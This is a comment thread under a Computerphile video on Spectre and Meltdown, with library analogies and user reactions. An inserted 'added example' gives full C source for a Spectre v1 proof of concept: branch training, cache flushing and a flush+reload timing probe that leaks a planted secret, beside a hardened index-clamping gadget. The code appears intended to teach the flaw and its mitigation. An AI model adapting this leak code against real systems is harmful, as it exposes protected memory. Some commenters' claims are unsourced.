Spectre & Meltdown - Computerphile

Spectre refers to a whole family of potential weaknesses of which Meltdown is just one. Dr Steve Bagley talks about CPU hardware design flaws on an unprecedented scale.

CPU Hardware: COMING SOON

This video was filmed and edited by Sean Riley.

Comments
Author

Best Analogy I've seen is as follows:

"Imagine that you (i.e. a malicious process) want to know whether someone (i.e. a victim process) has checked out a particular library book. The library (i.e. the CPU) refuses to give you access to their records and does not keep a slip inside the front cover. You can only see the record of which books you have checked out.

What you do is follow the person of interest into the library whenever they return a book. You then ask the librarian for a copy of the books you want to know whether the person has checked out. If the librarian looks down and says "You are in luck, I have a copy right here!" then you know the person had checked out that book. If the librarian has to go look in the stacks and comes back 5 minutes later with the book, you know that the person didn't check out that book (this time).

The way to make the library secure against this kind of attack is to require that all books be reshelved before they can be lent out again, unless the current borrower is requesting an extension.

There are many other ways to use the behavior of the librarian and the time it takes to retrieve a book to figure out which books a person is reading."

Not mine, don't know original source.

Craznar
Author

Thanks for getting a video out on this so quickly and pretending not to panic for the camera.

Can we see the cut shots where Dr Bagley is shouting "WE'RE ALL DOOMED" and Brady is talking him down from the window ledge?

nikanj
Author

Summary of the exploit: "Cache me outside... how bout dat?"

RangeWilson
Author

The real scandal is that Intel was notified about this over 6 months ago and their CEO dumped millions in stock before announcing this exploit.

ropro
Author

This is the best analogy I could come up with for how Spectre works:

Imagine you want to know the genre of book a particular person has checked out of the library. However, the library has strict privacy policies, and refuses to give you access to their records, only your own.

What you do is reserve a book from every genre that the library carries, and then ask the librarian for the book you reserved of the same genre as the victim's book. The librarian, to save time, immediately begins fulfilling this request, even bringing said book up to the front desk, before finally realizing that the request itself breaches library privacy, and so refuses to return the book to you. Seems like you're out of luck, you don't know the genre of your reserved book behind the desk, so you haven't learned the genre of the victim's book.
However, you now begin to request from the librarian every book you reserved one by one. Since these reserved books are properly a part of your records, the librarian happily obliges. For each book you note the librarian takes time to retrieve the book from inside the library, until one suspicious book is requested, which the librarian immediately hands you from behind the desk. That one suspicious book of course is the book requested from earlier, so with it identified and in your possession, you have successfully learned the genre of your victim's book.

Now imagine repeating this process multiple times on the same victim using other qualities besides genre: like author, publisher, and so on. Each quality you learn about your victim's book allows you to narrow down to the particular book your victim has checked out. Eventually, you will know for certain the identity of your victim's book, all by exploiting your hard-working and naive librarian.

Mpire
Author

I knew you’d post a video about it quickly! This is why I’m a happy subscriber

mattshilling
Author

So this is extremely low-level and thus hard for my high-level programmer brain to fully grasp, but let me see if I got this straight: if the bounds of a loop are stored in memory, the CPU will try to optimize by running the code in the loop first while waiting for the bounds to be retrieved; if the bounds turn out to be such that the loop shouldn't have been run, the result of the code is discarded. But when a value is taken from memory and used as an array index, those values are cached to speed up future reads, and the cache is not cleared during that "memory undo" process.

So if you try to access a memory location you shouldn't be able to inside a loop that "technically" terminates before that point, the access will still happen. And if you use that value as the index of an array you do have access to, it will be cached. At that point, the indexes of your valid array which are cached represent the values of the bytes you tried to access (the iterations of the loop beyond the slow-to-retrieve maximum bounds), so by timing how long it takes to retrieve those array entries, you can determine the values of the unauthorized bytes by interpreting the indexes of the fastest-loading array entries.

Is that correct?
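
Added example, not code from the video or from any commenter: the bounds-check-bypass gadget described in the comment above (and the cache-timing idea behind the library analogies earlier in the thread) written out in C, with the flush+reload probe that reads the leaked byte back out of the cache, beside a hardened gadget that clamps the index with a branch-free mask. The array names, the "constructed secret" string and the 80-cycle threshold are made up for the demo; whether the leak actually reproduces depends on the CPU, compiler flags and the microcode and OS mitigations in place, so the only deterministic part is the clamp.

```c
/* Spectre v1 gadget, flush+reload probe and a branch-free index clamp.
 * The probe needs x86 flush/timer intrinsics, so it is built only on x86-64. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#ifdef __x86_64__
#include <x86intrin.h>
#endif

#define STRIDE 4096                     /* one page per possible byte value */

static uint8_t  array1[16] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
static unsigned array1_size = 16;
static uint8_t  probe[256 * STRIDE];    /* attacker-owned array: "your own library record" */
static const char secret[] = "constructed secret";  /* data the gadget must never return */
static volatile uint8_t sink;

/* Vulnerable gadget.  With array1_size evicted, the branch is predicted (taken,
 * after training) and array1[x] is loaded speculatively even when x is out of
 * bounds; that byte picks which probe line becomes cached.  The squash drops
 * the architectural result but not the cache line. */
void victim_vulnerable(size_t x)
{
    if (x < array1_size)
        sink = probe[array1[x] * STRIDE];
}

/* Branch-free clamp, the construction behind Linux's array_index_nospec():
 * index when index < size, else 0 (both below SIZE_MAX/2).  Pure arithmetic,
 * so it holds even while the CPU runs the wrong side of a mispredicted check. */
size_t index_nospec(size_t index, size_t size)
{
    intptr_t m = ~(intptr_t)(index | (size - 1 - index));    /* negative iff index < size */
    size_t mask = (size_t)(m >> (sizeof(intptr_t) * 8 - 1)); /* all ones or all zeros */
    return index & mask;
}

void victim_hardened(size_t x)
{
    if (x < array1_size)
        sink = probe[array1[index_nospec(x, array1_size)] * STRIDE];
}

#ifdef __x86_64__
/* Time every probe line; the one under the threshold (cycles, a constructed
 * value for a typical desktop core) is the one the gadget touched. */
static int reload_fastest(uint64_t threshold)
{
    int best = -1;
    uint64_t best_t = UINT64_MAX;
    unsigned aux;
    for (int i = 0; i < 256; i++) {
        int line = (i * 167 + 13) & 255;  /* scrambled order defeats the stride prefetcher */
        uint8_t *addr = &probe[line * STRIDE];
        uint64_t t0 = __rdtscp(&aux);
        sink = *addr;
        uint64_t dt = __rdtscp(&aux) - t0;
        if (dt < best_t) { best_t = dt; best = line; }
    }
    return best_t < threshold ? best : -1;
}

/* Leak array1[malicious_x]: train the branch with x = 0, evict array1_size so
 * the check resolves late, and slip in the out-of-bounds index on every sixth
 * call.  The index choice is arithmetic, so this loop adds no learnable branch. */
static int leak_byte(size_t malicious_x)
{
    int hits[256] = {0};
    for (int round = 0; round < 200; round++) {
        for (int i = 0; i < 256; i++) _mm_clflush(&probe[i * STRIDE]);   /* flush */
        for (int j = 29; j >= 0; j--) {
            _mm_clflush(&array1_size);
            for (volatile int z = 0; z < 100; z++) { }          /* let the flush land */
            size_t pick = (size_t)0 - (size_t)(j % 6 == 0);    /* all ones on the attack call */
            victim_vulnerable(malicious_x & pick);
        }
        int line = reload_fastest(80);                          /* reload */
        if (line >= 0) hits[line]++;
    }
    int best = 0;
    for (int i = 1; i < 256; i++)
        if (hits[i] > hits[best]) best = i;
    return best;
}
#endif

int main(void)
{
#ifdef __x86_64__
    size_t off = (size_t)((uintptr_t)secret - (uintptr_t)array1);  /* out-of-bounds distance */
    for (size_t i = 0; i + 1 < sizeof secret; i++)
        putchar(leak_byte(off + i));
    putchar('\n');
#else
    puts("cache probe needs x86-64; gadgets and index_nospec still compiled");
#endif
    return 0;
}
```

Build with something like `cc -O1 spectre_v1.c` (filename assumed) on an x86-64 machine; on other architectures only the two gadgets and `index_nospec` are compiled and `main` just says so. The hardened gadget is the practical answer to "the access will still happen": you cannot stop the mispredicted path from running, so you make sure that what it loads is always inside the array.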

IceMetalPunk
Author

"Replace CPU hardware" *Straight face*
Laughed out loud

sada
Author

What infuriates me is that the majority of the headlines are about the slowdown, and not about the vulnerability itself -.-

jpHasABadHandle
Author

It looks like AMD hardware is only vulnerable to one of the three variants: the bounds check bypass. Some reports argue that this could be fixed by allowing the OS and the application code to disable speculative execution in certain circumstances. As I understand it, the bounds check bypass only allows exfiltrating data from the same process, with the branch target injection being able to reach another process and Meltdown making even the kernel vulnerable. Intel and ARM hardware are afflicted by all three.

fsdfsfs
Author

Interesting to note that all Raspberry Pi versions are invulnerable because their ARM chips either don't implement speculative branch evaluation (just branch prediction) or they don't implement it in a way that leaves traces in the cache.

jsbarretto
Author

Finally someone with knowledge of computer engineering addresses the issue and also points out that Meltdown affects Intel specifically.

DarkOfGold
Author

Literally checked this channel for this last night! You guys are awesome! Keep up the great work!

UltimateSNPA
Author

That was fast, I thought it would take you a week or so to discuss it.

mohamedtalaatharb
Author

It would be awesome if you could make more in-depth videos, not only on this topic, maybe including the code explanation.

registratoreprimo
Author

Fantastic job explaining these exploits! Probably the cleanest and to-the-point description I've seen on YouTube so far. You know you're doing good when your viewers can use you as a security news source. 😉

xplinux
Author

"Meltdown" (aka "Variant 3") is an Intel issue. Yes, Intel very much wants to confuse the matter, but make no mistake, that's their fuckup. (**see comments)

cacheman
Author

James Bond asks his mate "Mr CPU" to go wait for him at a bar. The Criminal Mastermind named "Meltdown" goes into the bar and says "I have a drink for Mr Bond here, anyone want it?" All in the bar take a while, looking around and asking "are you James Bond?", but Mr CPU instantly answers "No, he is not here", then James Bond walks in...

TechyBen
Author

After the end of Moore's Law, it turns out there's no such thing as a free lunch.

HebaruSan
Author

Somehow Scott Manley, the guy who plays Kerbal Space Program, had a much clearer and more detailed explanation than the Computerphile channel.

xlxlxl